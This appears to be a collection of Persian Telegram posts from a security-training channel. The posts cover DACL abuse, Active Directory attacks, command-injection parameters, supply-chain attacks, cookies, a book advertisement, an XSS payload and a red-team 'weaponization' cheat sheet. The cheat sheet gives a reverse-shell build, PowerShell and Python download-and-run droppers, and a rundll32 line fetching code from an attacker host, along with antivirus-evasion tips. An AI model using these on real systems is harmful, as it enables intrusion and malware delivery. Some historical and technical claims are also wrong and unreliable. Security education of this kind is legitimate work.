۱. درک DACL:
لیست کنترل دسترسی اختیاری (DACL) یک جزء حیاتی در امنیت ویندوز است.
این لیست به عنوان نگهبان عمل میکند و تعیین می کند که چه کسانی می توانند به منابع خاص (فایلها، دایرکتوریها و غیره) دسترسی داشته باشند و چه مجوزهایی دارند.
آن را مانند نگهبان در یک کلوپ انحصاری تصور کنید تصمیم می گیرد که چه کسی وارد شود و چه کارهایی می تواند داخل آنجا انجام دهد.
۲. آسیبپذیری:
گاهی اوقات، مدیران DACLها را به اشتباه پیکربندی می کنند و شکاف های امنیتی ایجاد می کنند.
یک مهاجم می تواند از این پیکربندی های اشتباه برای کسب دسترسی غیرمجاز یا افزایش سطح دسترسی اکسپلویت کند.
تصور کنید یک نفوذگر sneaky که به دلیل بررسی نادرست لیست مهمانان، از نگهبان عبور میکند.
۳. تکنیکهای رایج سوءاستفاده از DACL:
افزایش سطح دسترسی: یک مهاجم ACEها (ورودیهای کنترل دسترسی) را تغییر می دهد تا به خود سطح دسترسی بالاتری اعطا کند.
شمارش منابع: با تحلیل DACLها، مهاجمان اهداف ارزشمند را شناسایی میکنند.
بکدور: افزودن یک ACE جدید اجازه دسترسی پایدار بدون تشخیص را میدهد.
انکار سرویس: تغییر مخرب DACLها میتواند دسترسی قانونی را مختل کند.
این مانند یک دزد ماهر است که با مهارت از لیزرهای امنیتی عبور می کند تا به جواهر گرانبها برسد.
۴. مثالهای واقعی:
حمله بلیت طلایی یا Golden Ticket: سوءاستفاده از DACLها برای جعل بلیتهای Kerberos و کسب دسترسی مدیر دامنه.
DCSync: استخراج هشهای رمز عبور از Active Directory با دستکاری DACLها.
ربودن اشتراکگذاری فایل: تغییر DACLها برای دسترسی به فایلهای حساس در اشتراکگذاری های شبکه.
این exploting ها مانند دزدهای ماهر هستند که از ضعفهای سیستم امنیتی سوءاستفاده میکنند.
۵. استراتژیهای کاهش:
به طور منظم DACLها را حسابرسی کنید تا پیکربندی های اشتباه را شناسایی کنید.
از اصل کمترین دسترسی پیروی کنید: فقط مجوزهای لازم را اعطا کنید.
مدیران را در مورد پیکربندی صحیح DACL آموزش دهید.
این شبیه به تقویت پروتکل های امنیتی کلوپ برای جلوگیری از ورود افراد مشکل ساز است.
۶. بازی پرریسک:
سوءاستفاده از DACL یک بازی پرریسک است که در آن مهاجمان مجوزها را مانند قماربازان باتجربه دستکاری میکنند.
جایزه؟ دسترسی نامحدود به سیستمهای حیاتی و دادههای حساس.
سازمانها باید کارتهای خود را درست بازی کنند تا از نفوذها جلوگیری کنند.
@TryHackBox
لیست کنترل دسترسی اختیاری (DACL) یک جزء حیاتی در امنیت ویندوز است.
این لیست به عنوان نگهبان عمل میکند و تعیین می کند که چه کسانی می توانند به منابع خاص (فایلها، دایرکتوریها و غیره) دسترسی داشته باشند و چه مجوزهایی دارند.
آن را مانند نگهبان در یک کلوپ انحصاری تصور کنید تصمیم می گیرد که چه کسی وارد شود و چه کارهایی می تواند داخل آنجا انجام دهد.
۲. آسیبپذیری:
گاهی اوقات، مدیران DACLها را به اشتباه پیکربندی می کنند و شکاف های امنیتی ایجاد می کنند.
یک مهاجم می تواند از این پیکربندی های اشتباه برای کسب دسترسی غیرمجاز یا افزایش سطح دسترسی اکسپلویت کند.
تصور کنید یک نفوذگر sneaky که به دلیل بررسی نادرست لیست مهمانان، از نگهبان عبور میکند.
۳. تکنیکهای رایج سوءاستفاده از DACL:
افزایش سطح دسترسی: یک مهاجم ACEها (ورودیهای کنترل دسترسی) را تغییر می دهد تا به خود سطح دسترسی بالاتری اعطا کند.
شمارش منابع: با تحلیل DACLها، مهاجمان اهداف ارزشمند را شناسایی میکنند.
بکدور: افزودن یک ACE جدید اجازه دسترسی پایدار بدون تشخیص را میدهد.
انکار سرویس: تغییر مخرب DACLها میتواند دسترسی قانونی را مختل کند.
این مانند یک دزد ماهر است که با مهارت از لیزرهای امنیتی عبور می کند تا به جواهر گرانبها برسد.
۴. مثالهای واقعی:
حمله بلیت طلایی یا Golden Ticket: سوءاستفاده از DACLها برای جعل بلیتهای Kerberos و کسب دسترسی مدیر دامنه.
DCSync: استخراج هشهای رمز عبور از Active Directory با دستکاری DACLها.
ربودن اشتراکگذاری فایل: تغییر DACLها برای دسترسی به فایلهای حساس در اشتراکگذاری های شبکه.
این exploting ها مانند دزدهای ماهر هستند که از ضعفهای سیستم امنیتی سوءاستفاده میکنند.
۵. استراتژیهای کاهش:
به طور منظم DACLها را حسابرسی کنید تا پیکربندی های اشتباه را شناسایی کنید.
از اصل کمترین دسترسی پیروی کنید: فقط مجوزهای لازم را اعطا کنید.
مدیران را در مورد پیکربندی صحیح DACL آموزش دهید.
این شبیه به تقویت پروتکل های امنیتی کلوپ برای جلوگیری از ورود افراد مشکل ساز است.
۶. بازی پرریسک:
سوءاستفاده از DACL یک بازی پرریسک است که در آن مهاجمان مجوزها را مانند قماربازان باتجربه دستکاری میکنند.
جایزه؟ دسترسی نامحدود به سیستمهای حیاتی و دادههای حساس.
سازمانها باید کارتهای خود را درست بازی کنند تا از نفوذها جلوگیری کنند.
@TryHackBox
👍6
🛡۱۰ مورد از خطرناکترین روش حمله به Active Directory 🧑💻💻
✍️نویسنده
@TryHackBox | The Chaos
#AC #Acrive_Directory #Cybersecurity
✍️نویسنده
@TryHackBox | The Chaos
#AC #Acrive_Directory #Cybersecurity
Kerberoasting:
حملهای که در آن مهاجم با درخواست بلیطهای Kerberos مرتبط با حسابهای سرویس، سعی در کرک کردن آنها خارج از شبکه برای استخراج رمزعبورها دارد.
Password Spraying:
مهاجم یک رمزعبور رایج را بر روی تعداد زیادی از حسابها آزمایش میکند تا از قفل شدن حسابها به دلیل تلاشهای ناموفق جلوگیری کند.
️LLMNR Poisoning:
مهاجم با جعل پاسخها در شبکه داخلی از طریق پروتکل LLMNR، درخواستهای دستگاهها را رهگیری و هشهای رمزعبور (NTLM Hashes) را سرقت میکند.
Pass-the-Hash:
مهاجم از هش رمزعبور دزدیده شده برای ورود به سیستمها استفاده میکند بدون نیاز به دانستن رمزعبور اصلی، اغلب با ابزاری مانند Mimikatz.
Default Credentials:
مهاجم از حسابهای پیشفرضی که پس از نصب نرمافزارها یا دستگاهها تغییر نکردهاند سوءاستفاده میکند، مانند admin/admin.
Hard-coded Credentials:
رمزعبورهایی که مستقیماً در کدهای برنامه، فایلهای پیکربندی یا سیاستهای سیستم جاسازی شدهاند و استخراج و سوءاستفاده از آنها را آسان میکنند.
Privilege Escalation:
مهاجم با سوءاستفاده از آسیبپذیریها یا پیکربندیهای نادرست، از دسترسیهای محدود به دسترسیهای ادمین ارتقا پیدا میکند.
️LDAP Reconnaissance:
مهاجم با استفاده از کوئریهای LDAP (حتی گاهی بدون احراز هویت) اطلاعاتی درباره ساختار داخلی Active Directory مانند نام کاربران و گروهها جمعآوری میکند.
BloodHound Recon:
ابزاری که با تحلیل گرافها، مسیرهای افزایش دسترسی در Active Directory را شناسایی میکند و به مهاجم در برنامهریزی دقیق حملات کمک میکند.
NTDS.dit Extraction:
مهاجم فایل اصلی پایگاه داده Active Directory را که حاوی تمام حسابهای کاربری و هشهای رمزعبور است، استخراج میکند.
⚠️ این حملات غالباً زمانی کشف میشوند که دیگر خیلی دیر شده است!
⚠️ آسیبپذیریهای کوچک، حسابهای فراموش شده و پیکربندیهای ناامن، فرصتهای ایدهآلی برای مهاجمان فراهم میکنند.
✍️نویسنده
@TryHackBox | The Chaos
#AC #Acrive_Directory #Cybersecurity
حملهای که در آن مهاجم با درخواست بلیطهای Kerberos مرتبط با حسابهای سرویس، سعی در کرک کردن آنها خارج از شبکه برای استخراج رمزعبورها دارد.
Password Spraying:
مهاجم یک رمزعبور رایج را بر روی تعداد زیادی از حسابها آزمایش میکند تا از قفل شدن حسابها به دلیل تلاشهای ناموفق جلوگیری کند.
️LLMNR Poisoning:
مهاجم با جعل پاسخها در شبکه داخلی از طریق پروتکل LLMNR، درخواستهای دستگاهها را رهگیری و هشهای رمزعبور (NTLM Hashes) را سرقت میکند.
Pass-the-Hash:
مهاجم از هش رمزعبور دزدیده شده برای ورود به سیستمها استفاده میکند بدون نیاز به دانستن رمزعبور اصلی، اغلب با ابزاری مانند Mimikatz.
Default Credentials:
مهاجم از حسابهای پیشفرضی که پس از نصب نرمافزارها یا دستگاهها تغییر نکردهاند سوءاستفاده میکند، مانند admin/admin.
Hard-coded Credentials:
رمزعبورهایی که مستقیماً در کدهای برنامه، فایلهای پیکربندی یا سیاستهای سیستم جاسازی شدهاند و استخراج و سوءاستفاده از آنها را آسان میکنند.
Privilege Escalation:
مهاجم با سوءاستفاده از آسیبپذیریها یا پیکربندیهای نادرست، از دسترسیهای محدود به دسترسیهای ادمین ارتقا پیدا میکند.
️LDAP Reconnaissance:
مهاجم با استفاده از کوئریهای LDAP (حتی گاهی بدون احراز هویت) اطلاعاتی درباره ساختار داخلی Active Directory مانند نام کاربران و گروهها جمعآوری میکند.
BloodHound Recon:
ابزاری که با تحلیل گرافها، مسیرهای افزایش دسترسی در Active Directory را شناسایی میکند و به مهاجم در برنامهریزی دقیق حملات کمک میکند.
NTDS.dit Extraction:
مهاجم فایل اصلی پایگاه داده Active Directory را که حاوی تمام حسابهای کاربری و هشهای رمزعبور است، استخراج میکند.
⚠️ این حملات غالباً زمانی کشف میشوند که دیگر خیلی دیر شده است!
⚠️ آسیبپذیریهای کوچک، حسابهای فراموش شده و پیکربندیهای ناامن، فرصتهای ایدهآلی برای مهاجمان فراهم میکنند.
✍️نویسنده
@TryHackBox | The Chaos
#AC #Acrive_Directory #Cybersecurity
👍7
🔖 پارامترهایی که میتوانید تزریق کامند را در آنها امتحان کنید.
@TryHackBox
?cmd={payload}?exec={payload}?command={payload}?execute{payload}?ping={payload}?query={payload}?jump={payload}?code={payload}?reg={payload}?do={payload}?func={payload}?arg={payload}?option={payload}?load={payload}?process={payload}?step={payload}?read={payload}?function={payload}?req={payload}?feature={payload}?exe={payload}?module={payload}?payload={payload}?run={payload}?print={payload}@TryHackBox
🔥11❤7👍1
🔎🕵️♂️ شازر — یک فازر آنلاین که اجازه میدهد فازینگ تمام انواع رفتارهای مرورگر را انجام دهید. نتایج فازینگ خود را با تمام جهان به اشتراک بگذارید و باگهای جدیدی پیدا کنید!
شیتهای تقلب ارائهشده در سایت، از تمام وکتورهای حمله مرتبط ساخته شدهاند.
🐛 شکار باگها
#tools #bugbounty
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
شیتهای تقلب ارائهشده در سایت، از تمام وکتورهای حمله مرتبط ساخته شدهاند.
🐛 شکار باگها
#tools #bugbounty
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
🔥7❤1
🔐 حملات رایج زنجیره تأمین و روشهای پیشگیری
مقدمه
امنیت زنجیره تأمین با افزایش وابستگی کسبوکارها به فناوری، به موضوعی حیاتی تبدیل شده است. شناخت انواع رایج حملات زنجیره تأمین و راهکارهای محافظتی ضروری است.
انواع حملات زنجیره تأمین
1️⃣ حمله مرد میانی (MITM)
- رهگیری ارتباطات بین دو طرف بدون آگاهی آنها
- دستکاری دادهها برای دسترسی به اطلاعات حساس
2️⃣ حمله فیشینگ
- فریب کاربران برای افشای اطلاعات محرمانه مانند رمزعبور
- استفاده از ایمیل یا پیامهای جعلی
3️⃣ دستکاری نرمافزار (Software Tampering)
- تغییر کد نرمافزار برای دسترسی به دادههای حساس
- استفاده از کد دستکاری شده برای حمله به سیستمهای دیگر
4️⃣ تزریق بدافزار (Malware Injection)
- وارد کردن کد مخرب به سیستم هدف (کامپیوتر یا موبایل)
- دسترسی به دادههای حساس یا اجرای حملات دیگر
راهکارهای پیشگیری و کاهش
🔹 پیادهسازی اقدامات امنیتی قوی
- استفاده از فایروال، آنتیویروس و سیستمهای مانیتورینگ
- بهروزرسانی منظم نرمافزارها
🔹 نظارت بر تأمینکنندگان سوم
- ارزیابی اقدامات امنیتی شرکای تجاری
- شناسایی و رفع آسیبپذیریهای آنها
🔹 آموزش کارکنان
- افزایش آگاهی درباره ریسکهای امنیتی
- آموزش روشهای ایمن کار با دادههای حساس
🔹 استفاده از ارتباطات امن
- به کارگیری پروتکلهای رمزنگاری شده
- محافظت در برابر حملات مرد میانی
تاریخچه حملات
- اولین حمله ثبتشده: حمله "Code Red" در سال ۲۰۰۲
- حملات مشهور: "Stuxnet" (۲۰۱۰) و "NotPetya" (۲۰۱۷)
- افزایش توجه به امنیت زنجیره تأمین در سالهای اخیر
نتیجهگیری
با توجه به افزایش حملات زنجیره تأمین، کسبوکارها باید:
- سیستمهای خود را بهطور مستمر ارزیابی کنند
- از بهترین روشهای امنیتی استفاده نمایند
- کارکنان را آموزش دهند
✍️نویسنده
@TryHackBox | The Chaos
#Supply_Chain #MITM #Cybersecurity
مقدمه
امنیت زنجیره تأمین با افزایش وابستگی کسبوکارها به فناوری، به موضوعی حیاتی تبدیل شده است. شناخت انواع رایج حملات زنجیره تأمین و راهکارهای محافظتی ضروری است.
انواع حملات زنجیره تأمین
1️⃣ حمله مرد میانی (MITM)
- رهگیری ارتباطات بین دو طرف بدون آگاهی آنها
- دستکاری دادهها برای دسترسی به اطلاعات حساس
2️⃣ حمله فیشینگ
- فریب کاربران برای افشای اطلاعات محرمانه مانند رمزعبور
- استفاده از ایمیل یا پیامهای جعلی
3️⃣ دستکاری نرمافزار (Software Tampering)
- تغییر کد نرمافزار برای دسترسی به دادههای حساس
- استفاده از کد دستکاری شده برای حمله به سیستمهای دیگر
4️⃣ تزریق بدافزار (Malware Injection)
- وارد کردن کد مخرب به سیستم هدف (کامپیوتر یا موبایل)
- دسترسی به دادههای حساس یا اجرای حملات دیگر
راهکارهای پیشگیری و کاهش
🔹 پیادهسازی اقدامات امنیتی قوی
- استفاده از فایروال، آنتیویروس و سیستمهای مانیتورینگ
- بهروزرسانی منظم نرمافزارها
🔹 نظارت بر تأمینکنندگان سوم
- ارزیابی اقدامات امنیتی شرکای تجاری
- شناسایی و رفع آسیبپذیریهای آنها
🔹 آموزش کارکنان
- افزایش آگاهی درباره ریسکهای امنیتی
- آموزش روشهای ایمن کار با دادههای حساس
🔹 استفاده از ارتباطات امن
- به کارگیری پروتکلهای رمزنگاری شده
- محافظت در برابر حملات مرد میانی
تاریخچه حملات
- اولین حمله ثبتشده: حمله "Code Red" در سال ۲۰۰۲
- حملات مشهور: "Stuxnet" (۲۰۱۰) و "NotPetya" (۲۰۱۷)
- افزایش توجه به امنیت زنجیره تأمین در سالهای اخیر
نتیجهگیری
با توجه به افزایش حملات زنجیره تأمین، کسبوکارها باید:
- سیستمهای خود را بهطور مستمر ارزیابی کنند
- از بهترین روشهای امنیتی استفاده نمایند
- کارکنان را آموزش دهند
✍️نویسنده
@TryHackBox | The Chaos
#Supply_Chain #MITM #Cybersecurity
❤6
🚀 پارت 3 (A)
🍪 کوکیها (Cookies) چیه و چه کاری انجام میدن؟
کوکیها راهی برای شناسایی کاربران و ایجاد جلسات (Sessions) پایدار در وب هستند. در گذشته کاربران مشکلات فنی زیادی داشتند، اما کوکیها به عنوان یک راهحل فنی برای ایجاد ارزش بیشتر به وجود اومدن.
🔹 تاریخچه مختصر:
کوکیها رو اولین بار Netscape توسعه داد، اما امروز همه مرورگرهای اصلی ازشون پشتیبانی میکنن. اونها بخش مهمی از پروتکل HTTP هستن و روی عملکرد حافظه نهان (Cache) مرورگر هم تاثیر میذارن.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
🍪 کوکیها (Cookies) چیه و چه کاری انجام میدن؟
کوکیها راهی برای شناسایی کاربران و ایجاد جلسات (Sessions) پایدار در وب هستند. در گذشته کاربران مشکلات فنی زیادی داشتند، اما کوکیها به عنوان یک راهحل فنی برای ایجاد ارزش بیشتر به وجود اومدن.
🔹 تاریخچه مختصر:
کوکیها رو اولین بار Netscape توسعه داد، اما امروز همه مرورگرهای اصلی ازشون پشتیبانی میکنن. اونها بخش مهمی از پروتکل HTTP هستن و روی عملکرد حافظه نهان (Cache) مرورگر هم تاثیر میذارن.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
❤3👍1
🚀 پارت 3 (B)
🧠 چطوری کار میکنن؟
کوکیها در واقع مثل برچسبهای "اسم من ... است" (Hello, My Name Is) هستن که سرور اونها رو به کاربر میچسبونه.
وقتی شما یک سایت رو باز میکنید، اون سایت میتونه تمام برچسبهایی (کوکیهایی) که خودش قبلاً برای شما گذاشته رو بخونه.
🔰 در اولین بازدید:
وقتی برای اولین بار به یک سایت سر میزنید، سرور هیچ اطلاعاتی درباره شما نداره. اما چون حدس میزنه دوباره برمیگردید، یک کوکی منحصر به فرد برای شما میسازه و via مرورگر براتون ذخیره میکنه. اینطوری میتونه دفعه بعد شما رو شناسایی کنه.
این کوکی از یک جفت نام=مقدار (مثلاً user_id=12345) تشکیل شده و سرور آن را با استفاده از هدرهای پاسخ HTTP مثل Set-Cookie برای مرورگر شما میفرسته.
🔹 انواع کوکیها:
به طور کلی دو نوع اصلی داریم:
1️⃣ کوکی Session (موقت):
این کوکی موقته و فقط هنگام حرکت شما در یک سایت فعاله. با بستن مرورگر، این کوکی پاک میشه! برای ذخیره موقت ترجیحات و تنظیمات شما به کار میره.
2️⃣ کوکی Persistent (دائمی):
این کوکیها ماندگاری بیشتری دارن و حتی بعد از بستن و باز کردن مجدد مرورگر هم باقی میمونن! از این کوکیها معمولاً برای به خاطر سپردن اطلاعات لاگین، پروفایل و تنظیمات شخصیشده استفاده میشه.
🔹 تفاوت اصلی:
فرق اصلی این دو در زمان انقضاشونه. اگر کوکی دارای پارامترهای Expires یا Max-Age باشه (یا پارامتر Discard رو نداشته باشه)، یک کوکی Persistent محسوب میشه.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
🧠 چطوری کار میکنن؟
کوکیها در واقع مثل برچسبهای "اسم من ... است" (Hello, My Name Is) هستن که سرور اونها رو به کاربر میچسبونه.
وقتی شما یک سایت رو باز میکنید، اون سایت میتونه تمام برچسبهایی (کوکیهایی) که خودش قبلاً برای شما گذاشته رو بخونه.
🔰 در اولین بازدید:
وقتی برای اولین بار به یک سایت سر میزنید، سرور هیچ اطلاعاتی درباره شما نداره. اما چون حدس میزنه دوباره برمیگردید، یک کوکی منحصر به فرد برای شما میسازه و via مرورگر براتون ذخیره میکنه. اینطوری میتونه دفعه بعد شما رو شناسایی کنه.
این کوکی از یک جفت نام=مقدار (مثلاً user_id=12345) تشکیل شده و سرور آن را با استفاده از هدرهای پاسخ HTTP مثل Set-Cookie برای مرورگر شما میفرسته.
🔹 انواع کوکیها:
به طور کلی دو نوع اصلی داریم:
1️⃣ کوکی Session (موقت):
این کوکی موقته و فقط هنگام حرکت شما در یک سایت فعاله. با بستن مرورگر، این کوکی پاک میشه! برای ذخیره موقت ترجیحات و تنظیمات شما به کار میره.
2️⃣ کوکی Persistent (دائمی):
این کوکیها ماندگاری بیشتری دارن و حتی بعد از بستن و باز کردن مجدد مرورگر هم باقی میمونن! از این کوکیها معمولاً برای به خاطر سپردن اطلاعات لاگین، پروفایل و تنظیمات شخصیشده استفاده میشه.
🔹 تفاوت اصلی:
فرق اصلی این دو در زمان انقضاشونه. اگر کوکی دارای پارامترهای Expires یا Max-Age باشه (یا پارامتر Discard رو نداشته باشه)، یک کوکی Persistent محسوب میشه.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
❤5
📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته
📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)
این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیبپذیریها، و تکنیکهای نفوذ می پردازد. محتوای اصلی کتاب شامل فصلهایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیکهای کپچرینگ پکتها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است.
این کتاب مناسب چه کسانی است؟
ویژگی های کتاب ؟
چرا باید این کتاب را بخرید؟
دانلود فایل های تمرین و سناریوها
توضیحات کامل را بخوانید .
💰 قیمت : ۲۵۰,۰۰۰ تومان
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)
این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیبپذیریها، و تکنیکهای نفوذ می پردازد. محتوای اصلی کتاب شامل فصلهایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیکهای کپچرینگ پکتها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است.
این کتاب مناسب چه کسانی است؟
ویژگی های کتاب ؟
چرا باید این کتاب را بخرید؟
دانلود فایل های تمرین و سناریوها
توضیحات کامل را بخوانید .
💰 قیمت : ۲۵۰,۰۰۰ تومان
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
🔥3❤1
نمونه_کتاب_وایرشارک_برای_ردتیمرها.pdf
1.4 MB
📘 کتاب "وایرشارک برای ردتیمرها"
راهنمای تخصصی تحلیل شبکه برای هکرهای اخلاقی و تیمهای قرمز
⚠️ توجه:
این فایل تنها نمونهای از صفحات کتاب است و برخی مطالب و آموزش ها به منظور حفظ اصالت اثر حذف شدهاند.
برای دریافت نسخهی کامل و دسترسی به تمامی تمرینها و سناریوها، میتوانید کتاب را به صورت کامل خریداری کنید.
توضیحات کتاب و قیمت
توضیحات کامل
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
راهنمای تخصصی تحلیل شبکه برای هکرهای اخلاقی و تیمهای قرمز
⚠️ توجه:
این فایل تنها نمونهای از صفحات کتاب است و برخی مطالب و آموزش ها به منظور حفظ اصالت اثر حذف شدهاند.
برای دریافت نسخهی کامل و دسترسی به تمامی تمرینها و سناریوها، میتوانید کتاب را به صورت کامل خریداری کنید.
توضیحات کتاب و قیمت
توضیحات کامل
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
👍9
Weaponization Cheat Sheet (Red Team)
اهداف این مرحله
آمادهسازی فایل/کدی که بشه به تارگت تحویل داد.
ترکیب exploit + payload.
پنهانسازی تا حد امکان (AV/EDR bypass).
تکنیکهای متداول
1. Exploit + Payload
استفاده از Metasploit msfvenom برای ساخت payload:
تزریق توی اسناد آفیس (Word/Excel):
VBA Macro payload
DDE Exploit
2. Phishing Attachments
فایلهای weaponized:
3. Web Delivery Payload
PowerShell One-Liner:
Python Dropper:
4. Obfuscation / Evasion
AV bypass:
Shellcode obfuscation با donut یا scarecrow
String encoding (Base64, XOR, AES)
EDR bypass:
LOLBins (living-off-the-land binaries) مثل:
5. Payload Hosting
وبسرور ساده:
یا استفاده از ngrok برای تونل زدن.
ابزارهای مهم
نویسنده
@tryhackbox | arian momeni
اهداف این مرحله
آمادهسازی فایل/کدی که بشه به تارگت تحویل داد.
ترکیب exploit + payload.
پنهانسازی تا حد امکان (AV/EDR bypass).
تکنیکهای متداول
1. Exploit + Payload
استفاده از Metasploit msfvenom برای ساخت payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
تزریق توی اسناد آفیس (Word/Excel):
VBA Macro payload
DDE Exploit
2. Phishing Attachments
فایلهای weaponized:
.docm → ماکرو مخرب
.xlsm → ماکرو
.hta → ویندوز اسکریپت
.lnk → شورتکات با کد مخفی
.pdf → با جاوااسکریپت یا exploit
3. Web Delivery Payload
PowerShell One-Liner:
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"Python Dropper:
import urllib.request, os
url = "http://ATTACKER/shell.exe"
urllib.request.urlretrieve(url, "update.exe")
os.system("update.exe")
4. Obfuscation / Evasion
AV bypass:
Shellcode obfuscation با donut یا scarecrow
String encoding (Base64, XOR, AES)
EDR bypass:
LOLBins (living-off-the-land binaries) مثل:
rundll32.exe
javanoscript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("noscript:http://ATTACKER/shell.sct")5. Payload Hosting
وبسرور ساده:
python3 -m http.server 80
یا استفاده از ngrok برای تونل زدن.
ابزارهای مهم
msfvenom / Metasploit
Cobalt Strike (beacon generation)
Empire / Sliver C2
ScareCrow (AV evasion)
donut (shellcode loader)
macro_pack (ماکرو سازی خودکار برای آفیس)
نویسنده
@tryhackbox | arian momeni
👍5❤2
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
🚀 پارت 4 (A)
🍪 کوکیها (Cookies): از شناسایی تا ذخیره اطلاعات
در پست قبل راجع به اساسيات کوکیها صحبت کردیم. حالا بپردازیم به جزئیات بیشتر!
🔢 چه اطلاعاتی در کوکی ذخیره میشود؟
کوکیها میتوانند حاوی هر اطلاعاتی باشند، اما اغلب شامل یک شماره شناسه منحصر به فرد (Unique ID) هستند که توسط سرور برای اهداف بازیابی استفاده میشود.
مثال: سرور یک کوکی با مقدار id=34294 برای کاربر قرار میدهد. سپس میتواند از این شماره برای جستجوی اطلاعات بیشتر کاربر (مانند تاریخچه خرید، آدرس و...) در پایگاه داده خودش استفاده کند.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
🍪 کوکیها (Cookies): از شناسایی تا ذخیره اطلاعات
در پست قبل راجع به اساسيات کوکیها صحبت کردیم. حالا بپردازیم به جزئیات بیشتر!
🔢 چه اطلاعاتی در کوکی ذخیره میشود؟
کوکیها میتوانند حاوی هر اطلاعاتی باشند، اما اغلب شامل یک شماره شناسه منحصر به فرد (Unique ID) هستند که توسط سرور برای اهداف بازیابی استفاده میشود.
مثال: سرور یک کوکی با مقدار id=34294 برای کاربر قرار میدهد. سپس میتواند از این شماره برای جستجوی اطلاعات بیشتر کاربر (مانند تاریخچه خرید، آدرس و...) در پایگاه داده خودش استفاده کند.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
❤7
🔔 اطلاعیه
دوستان گرامی،
محتوای آموزشی این مجموعه با صرف زمان و تلاش فراوان تهیه میشود. متأسفانه در مواردی دیده شده که مطالب بدون ذکر منبع بازنشر شدهاند.
ذکر منبع هنگام استفاده از محتوا، احترام به حقوق معنوی و تلاش تیم ماست و باعث میشود این روند آموزشی با انگیزه و استمرار بیشتری ادامه پیدا کند.
از همراهی و توجه شما سپاسگزاریم و امیدواریم دیگر شاهد چنین مواردی نباشیم.
@TryHackBox
دوستان گرامی،
محتوای آموزشی این مجموعه با صرف زمان و تلاش فراوان تهیه میشود. متأسفانه در مواردی دیده شده که مطالب بدون ذکر منبع بازنشر شدهاند.
ذکر منبع هنگام استفاده از محتوا، احترام به حقوق معنوی و تلاش تیم ماست و باعث میشود این روند آموزشی با انگیزه و استمرار بیشتری ادامه پیدا کند.
از همراهی و توجه شما سپاسگزاریم و امیدواریم دیگر شاهد چنین مواردی نباشیم.
@TryHackBox
❤16
👩💻 عملگرهای انتساب منطقی در JavaScript برای بهرهبرداری از XSS به عنوان یک مثال دیگر از اهمیت دور شدن از پیلودهای معمولی.
#bugbounty #tips
@TryHackBox
window&&=(window&&=opener||=alert)?.(1??0,)
#bugbounty #tips
@TryHackBox
❤6
🚀 پارت 4 (B)
📝 ذخیره مستقیم اطلاعات
با این حال، کوکیها فقط به یک ID محدود نیستند. برخی سرورها انتخاب میکنند که اطلاعات را مستقیماً در کوکی نگه دارند. مثال:
Cookie: name="Brian Totty"; phone="555-1212"
